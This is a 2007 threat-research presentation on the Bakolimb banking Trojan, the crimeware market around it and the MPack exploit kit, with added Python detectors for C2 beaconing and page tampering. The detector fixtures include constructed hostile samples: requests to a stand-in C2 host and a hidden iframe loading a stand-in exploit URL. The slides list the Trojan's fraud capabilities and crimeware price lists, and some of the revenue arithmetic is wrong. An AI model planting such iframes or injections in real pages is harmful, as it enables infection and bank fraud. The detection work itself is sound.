Once upon a time a Trojan…

Luis Corrons 09/21/2007


The Trojan


- First discovered in January 2007 via “Targeted Attack Alert Services”

- Affects multiple financial institutions

- Detected as Bakolimb, also known as Limbo or Nethell.

- Consists of 3 main components:
  – Helper.XML
  – Helper.DLL
  – Control Server and Control Panel


- DLL
  – BHO (Browser Helper Object)
  – Keylogger
  – Creates a UniqueID per infected machine. Uses this UID to communicate with the Control Server and to receive commands from it
  – Client <-> server communication via PHP scripts
  – Deletes cookies
  – Stolen info is stored in text files. As soon as it connects, it sends the TXT file
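The DLL behaviour listed above (a per-machine UID, PHP scripts as the client/server channel, a TXT upload on first contact) gives a defender a pattern to look for in web-proxy logs. The following is an added example, not code from the presentation or from the Trojan or its control panel; the log format, the hosts, the script names and the parameter names treated as machine identifiers are all constructed or assumed:

```python
"""
Added example (not from the presentation): a small log-analysis routine that
looks for the beaconing pattern the slides describe -- an infected host
repeatedly calling PHP scripts on one server with a per-machine UID -- in
web-proxy logs. The log format and all values below are constructed for the
example; the id parameter names and the script names are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Constructed sample proxy log lines: "<timestamp> <client> <method> <url>"
SAMPLE_LOG = """\
2007-02-28T09:00:01 10.0.0.5 POST http://c2.example.invalid/gate.php?uid=3FA2C1
2007-02-28T09:00:02 10.0.0.5 POST http://c2.example.invalid/upload.php?uid=3FA2C1
2007-02-28T09:05:01 10.0.0.5 GET http://c2.example.invalid/cmd.php?uid=3FA2C1
2007-02-28T09:10:02 10.0.0.5 GET http://c2.example.invalid/cmd.php?uid=3FA2C1
2007-02-28T09:15:00 10.0.0.5 GET http://c2.example.invalid/cmd.php?uid=3FA2C1
2007-02-28T09:03:11 10.0.0.7 GET http://news.example.invalid/index.php?page=3
2007-02-28T09:41:52 10.0.0.7 GET http://news.example.invalid/index.php?page=4
2007-02-28T10:20:03 10.0.0.7 POST http://shop.example.invalid/cart.php?item=9
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+)$")
# Candidate names for a machine-identifier query parameter (assumption, not from the slides).
ID_PARAMS = {"uid", "id", "bot", "hwid"}

def parse_log(text):
    """Yield (timestamp, client, method, host, path, query) for each well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.fromisoformat(m.group(1))
        parts = urlsplit(m.group(4))
        yield ts, m.group(2), m.group(3), parts.hostname, parts.path, parse_qs(parts.query)

def find_beacons(text, min_hits=4, max_jitter=5.0):
    """
    Return {(client, host): details} for client/host pairs where:
      * every request goes to a .php script,
      * every request carries the same value in a machine-id-like parameter,
      * the check-ins recur at a near-constant interval (spread <= max_jitter seconds).
    """
    by_pair = defaultdict(list)
    for ts, client, method, host, path, query in parse_log(text):
        by_pair[(client, host)].append((ts, path, query))

    suspects = {}
    for (client, host), reqs in by_pair.items():
        if len(reqs) < min_hits or not all(p.endswith(".php") for _, p, _ in reqs):
            continue
        # A stable identifier across every request is the per-machine UID pattern.
        if not all(any(k in q for k in ID_PARAMS) for _, _, q in reqs):
            continue
        ids = {q[k][0] for _, _, q in reqs for k in ID_PARAMS if k in q}
        if len(ids) != 1:
            continue
        times = sorted(t for t, _, _ in reqs)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if not gaps:
            continue
        # First contact also uploads a file (gate + upload within a second), so drop the
        # shortest gap and judge regularity on the remaining check-ins.
        gaps = sorted(gaps)[1:] if len(gaps) > 2 else gaps
        if max(gaps) - min(gaps) <= max_jitter:
            suspects[(client, host)] = {
                "uid": ids.pop(),
                "interval_s": round(sum(gaps) / len(gaps)),
                "scripts": sorted({p for _, p, _ in reqs}),
            }
    return suspects

if __name__ == "__main__":
    for pair, info in find_beacons(SAMPLE_LOG).items():
        print(pair, info)
```

On the constructed log, only the 10.0.0.5 / c2.example.invalid pair is reported: five PHP requests, one constant uid value, and check-ins about 299 seconds apart. The two ordinary PHP sites browsed by 10.0.0.7 are left alone because they are neither repeated enough nor carry a stable identifier.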


- XML
  – Code to be injected in websites
  – Encrypted in latest versions


Control Panel


- User Admin

- Command Admin

- Search in logs

- Infect stats

- Etc.


– Command execution and monitoring.

– Commands are queued in case the client is not connected.


Data Stolen


Trojan’s Author


- Google

- Sells everything (Trojan & Control Panel)

- Everything is well documented

- Advertised in different forums (all Russian)

- Price: 1000 – 350 wmz


– logging of virtual keyboards, stealing of keys (bankofamerica but also of other banks which have key-based security system)

– scam (aka fake pages with substitution of the IE address bar and status bar)

– setting filters for sites which should not be grabbed

– code inject - to add your own text box into a particular site, e.g. for getting the holder's PIN


For an additional fee:

– Hidden transfer (transfer on command by the admin software) - adapted SPECIFICALLY for one particular bank

– Automatic download (e.g. when the user makes a transfer the Trojan substitutes your account completely or a drop and the appropriate sum) - useful if the transfer requires an SMS confirmation. Adapted specifically for a particular bank.


- removal - 40 wmz

- Reprogramming to a different host - 40 wmz

- Build - 1000 wmz

In addition, there is an option to buy a local parser for logs, separately. For all questions please contact me via ICQ.

There are plans for sales of the builder. Estimated price: 3500 wmz.

Servers


- Google

- Several servers

- Groups of servers belonged to different hackers

- “Sushi” server

“Sushi” server

[Chart: Total Infected Computers (left axis, 0–50,000) and Infected Computers per Day (right axis, 0–3,000), plotted by date]


- Win32.exe = Trojan downloader

- February 28th, 2007

- Installed:
  – Trj/Spammer.ZO
  – Adware/Bravesentry
  – Application/Bravesentry


- Earning money via sending spam and promoting rogue antispyware

- Every day there was a new downloader that installed different

- We finally managed to take the server down

- Who pays?

- How much?
  – USA $0.30
  – Canada & UK $0.10
  – Western Europe $0.03
  – Other Countries $0.02


- Let’s do some maths

  – Other Countries: $0.02 * 43,323 = $966.46
  – Western Europe: $0.03 * 43,323 = $1,299.69
  – Canada & UK: $0.10 * 43,323 = $4,332.30
  – USA: $0.30 * 43,323 = $12,996.90

  – Other Countries: $0.02 * 43,323 * 20 = $19,329
  – Western Europe: $0.03 * 43,323 * 20 = $25,993
  – Canada & UK: $0.10 * 43,323 * 20 = $86,646
  – USA: $0.30 * 43,323 * 20 = $259,938

Infected Team


- Value added services

  – Proxy sales: 5 - $2.5; 1,000 - $300

  – DDoS: 1 hour - $20; 1 day - $100; Major projects starting at $200; 10 minutes for free!

  – Spam:
    – Russia (enterprises): 5,000,000 – US$120 / million messages
    – Russia (home users), Ukraine and CIS: 20,700,000 – US$100 / million messages
    – USA: 121,000,000 – US$150 / million messages
    – Western Europe: 45,902,256 – US$130 / million messages
    – Total: 192,000,000


- Software

  – Personal cryptor ($15, updates $5)

  – ABLoader ($60, builder $500)

  – RooT iFrame ($25 Russian, $50 English)

  – SpamPHP Script ($2)

  – FTPCheckIframe ($25)

“Cool” stuff found on the servers

- IDPack
  – Plastic ID card
  – Support Double Side ID Card Printer
  – Simulate Double Side Card Printer
  – Signature Pad
  – Fingerprint Reader
  – Magnetic Stripe Encoder
  – Smartcard Contact Station
  – Fast and easy to use
  – Design an unlimited number of badges
  – User-friendly interface
  – Unlimited badge formats
  – Flexible layouts: PVC, 1000 Avery, 36 Zebra/Citizen and 40 DYMO LabelWriter label formats.
  – Takes pictures from a Webcam, a CamTracer or imports it from file
  – Powerful print management
  – Operates in local and network setups
  – High production volume
  – 14 security levels with color codes
  – 28 types of barcodes built in

- Phishing


- Dream Downloader


- How could they manage to infect thousands of computers?

MPack


- Tracing MPack for 2 months (April & May 2007):

  – 41 different servers with MPack running

  – 366,717 web pages “iframed”

  – More than 1 million users infected (1,217,741)


- Tool to install malware

- Written in PHP

- Developed by “Dream Coders Team”

- Price $700 ($1,000 including Dream Downloader)


- Adding new exploit: $50 - $150

- Avoid AV detection: $20 – $30


- Many different exploits:

  – WebViewFolderIcon overflow

  – WinZip ActiveX overflow

  – QuickTime overflow

  – ANI overflow

  – Etc.


- Most used way to infect users: iframe
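Two of the techniques on these slides leave traces in the HTML a client actually receives: the injected code that adds an extra text box (such as a PIN field) to a bank page, and the hidden iframe that MPack used to send visitors of an “iframed” site to its exploit server. The following is an added example, not code from the presentation, from MPack, or from the Trojan; it audits a fetched page for both patterns, and the bank host, the expected field list and the sample pages are constructed for the example:

```python
"""
Added example (not code from the presentation or from the malware/tools it
describes): a checker for two page-tampering patterns the slides mention.
1. Web injection -- extra input fields (e.g. a PIN box) added to a bank's
   login form by the Trojan's injected code.
2. Hidden iframes -- the MPack "iframe" technique, where a compromised site
   loads an exploit-kit URL in an invisible frame.
The expected-field list, the sample pages and all hosts are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Input types that never carry user-typed data, so they are not injection candidates.
NON_DATA_INPUTS = {"hidden", "submit", "button", "image", "reset"}

class PageAudit(HTMLParser):
    """Collect user-facing input names and iframe attributes from an HTML document."""
    def __init__(self):
        super().__init__()
        self.inputs = []   # names of data-carrying <input> elements, in document order
        self.iframes = []  # attribute dicts of <iframe> elements

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "text").lower() not in NON_DATA_INPUTS:
            self.inputs.append(a.get("name", ""))
        elif tag == "iframe":
            self.iframes.append(a)

def _is_tiny(value):
    """True for a width/height attribute that makes a frame effectively invisible (0 or 1 px)."""
    v = value.strip().rstrip("px").strip()
    return v.isdigit() and int(v) <= 1

def suspicious_iframes(iframes, own_host):
    """Return src URLs of iframes that point off-site and are hidden by size or style."""
    hits = []
    for a in iframes:
        src = a.get("src", "")
        host = urlsplit(src).hostname
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (_is_tiny(a.get("width", "")) or _is_tiny(a.get("height", ""))
                  or "display:none" in style or "visibility:hidden" in style)
        if host and host != own_host and hidden:
            hits.append(src)
    return hits

def audit_page(html, own_host, expected_inputs):
    """Return findings: visible inputs not in the expected set, and hidden off-site iframes."""
    p = PageAudit()
    p.feed(html)
    unexpected = [n for n in p.inputs if n not in expected_inputs]
    return {"unexpected_inputs": unexpected,
            "hidden_iframes": suspicious_iframes(p.iframes, own_host)}

# Constructed sample: the bank's genuine login form.
CLEAN_PAGE = """
<html><body>
<form action="/login" method="post">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="hidden" name="csrf" value="abc">
  <input type="submit" value="Log in">
</form>
</body></html>
"""

# Constructed sample: the same form after injection of a PIN field and a 1x1 off-site iframe.
TAMPERED_PAGE = CLEAN_PAGE.replace(
    '<input type="password" name="pass">',
    '<input type="password" name="pass">\n  <input type="text" name="pin">'
).replace(
    "</body>",
    '<iframe src="http://exploit.example.invalid/in.php" width="1" height="1"></iframe></body>'
)

EXPECTED_INPUTS = {"user", "pass"}  # fields the genuine page should contain (assumption)

if __name__ == "__main__":
    print(audit_page(CLEAN_PAGE, "bank.example.invalid", EXPECTED_INPUTS))
    print(audit_page(TAMPERED_PAGE, "bank.example.invalid", EXPECTED_INPUTS))
```

The allow-list of expected field names is the part a site owner has to maintain; the iframe check needs no site knowledge beyond the page's own hostname, which is why it suits a crawl over many pages looking for the kind of mass “iframing” counted on the MPack slide.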